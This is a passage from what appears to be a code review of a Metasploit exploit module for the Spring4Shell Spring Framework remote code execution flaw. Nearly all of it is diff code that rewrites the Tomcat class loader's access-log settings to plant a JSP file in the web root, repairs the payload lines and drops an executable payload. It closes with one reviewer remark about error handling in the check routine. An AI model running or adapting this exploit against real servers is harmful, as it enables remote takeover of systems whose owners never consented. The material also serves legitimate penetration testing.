modules/exploits/multi/http/spring_framework_rce_spring4shell.rb

```diff
@@ -0,0 +1,286 @@
+        "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
+      }
+    })
+
+    res
+  end
+
+  def check_log_file(hint)
+    uri = normalize_uri("/", @jsp_file)
+
+    print_status("#{peer} - Waiting for the server to flush the logfile")
+
+    10.times do |x|
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger payload
+      vprint_status("#{peer} - Countdown #{10-x}...")
+      res = dump_line(uri)
+
+      # Failure. The request timed out or the server went away.
+      fail_with(Failure::TimeoutExpired, "#{peer} - Not received response") if res.nil?
+
+      # Success if the server has flushed all the sent commands to the jsp file
+      if res.code == 200
+        print_good("#{peer} - Log file flushed at http://#{peer}/#{@jsp_file}")
+        return true
+      end
+    end
+
+    false
+  end
+
+  # Fix the JSP payload to make it valid once is dropped
+  # to the log file
+  def fix(jsp)
+    output = ""
+    jsp.each_line do |l|
+      if l =~ /<%.*%>/
+        output << l
+      elsif l =~ /<%/
+        next
+      elsif l.chomp.empty?
+        next
+      else
+        output << "<% #{l.chomp} %>"
+      end
+    end
+    output
+  end
+
+  def create_jsp
+    if target['Arch'] == ARCH_JAVA
+      jsp = fix(payload.encoded)
+    else
+      payload_exe = generate_payload_exe
+      payload_file = rand_text_alphanumeric(4 + rand(4))
+      payload_dir = datastore['FILEDROPPERDIR']
+
+      jsp = jsp_dropper(payload_dir + payload_file, payload_exe)
+      register_files_for_cleanup(payload_dir + payload_file)
+    end
+
+    jsp
+  end
+
+  def check
+    prefix_jsp = rand_text_alphanumeric(3+rand(3))
+    date_format = rand_text_numeric(1+rand(4))
+    @jsp_file = prefix_jsp + date_format + ".jsp"
+
+    status = CheckCode::Safe
+
+    # Prepare the JSP
+    print_status("#{peer} - Generating JSP...")
+    
+    # Modify the Class Loader
+    print_status("#{peer} - Modifying Class Loader...")
+    properties = {
+      :payload        => prefix_jsp,
+      :directory      => 'webapps/ROOT',
+      :prefix         => prefix_jsp,
+      :suffix         => '.jsp',
+      :file_date_format => date_format
+    }
+    res = modify_class_loader(properties)
+    unless res
+      fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
+    end
+
+    # No matter what happened, try to 'restore' the Class Loader
+    properties = {
+        :payload        => '',
+        :directory      => '',
+        :prefix         => '',
+        :suffix         => '',
+        :file_date_format => ''
+    }
+    modify_class_loader(properties)
+
+    # Check if the log file exists and has been flushed
+    if check_log_file(normalize_uri(target_uri.to_s))
+      register_files_for_cleanup(@jsp_file)
+      status = CheckCode::Vulnerable
+    else
+      fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
```

Comment:
`fail_with` should not be used in `check`. Return `CheckCode::Safe` or `CheckCode::Unknown` instead.